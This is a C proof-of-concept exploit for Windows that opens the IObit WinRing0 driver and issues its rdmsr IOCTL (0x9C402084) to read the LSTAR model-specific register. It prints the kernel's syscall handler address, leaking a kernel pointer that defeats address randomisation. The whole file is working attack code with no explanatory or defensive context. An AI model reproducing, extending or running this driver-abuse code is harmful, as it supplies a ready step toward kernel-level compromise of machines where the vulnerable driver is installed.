#include <windows.h>
#include <stdio.h>
typedef unsigned long long QWORD; // DWORD64

// Exploit Data
DWORD IA32_MSR_LSTAR = 0xC0000082; // MSR_LSTAR 

 int main(int argc, char* argv[]) {
    HANDLE hDriver = CreateFileW(L"\\\\.\\IOBIT_WinRing0_1_3_0", GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, 0, NULL); // Get a handle to the driver

  if (hDriver != INVALID_HANDLE_VALUE) {
    printf("[i] Found driver\n");
    LPVOID lpOutMemoryArea = VirtualAlloc((LPVOID)0x41000000, 0x100, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    LPVOID lpInMemoryArea = VirtualAlloc((LPVOID)0x42000000, 0x100, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    if (lpOutMemoryArea == NULL || lpInMemoryArea == NULL) {
      printf("[!!!] Unable to allocate memory\n");
      ExitProcess(-1);
    }
    printf("[i]Allocated memory\n");
    memmove(lpInMemoryArea, &IA32_MSR_LSTAR, sizeof(DWORD));
    DWORD dwIoctl = 0x9C402084; // rdmsr IOCTL
    printf("[i] Sending IOCTL 0x%X\n", dwIoctl);
    DWORD dwBytesOut = 0;
    NTSTATUS dwLastError = DeviceIoControl(hDriver, dwIoctl, lpInMemoryArea, 0x4, lpOutMemoryArea, 0x8, &dwBytesOut, NULL);
    // nlnInBufferSize and nOutBufferSize are in Bytes (0x4 and 0x8 are the minimum)
    printf("MSR 0xC0000082: %I64X - (nt!KiSystemCall64Shadow)\n", *(QWORD*)lpOutMemoryArea);
  }
  else {
    printf("[!!!] Unable to find driver\n");
    ExitProcess(-1);
  }
  ExitProcess(0);
}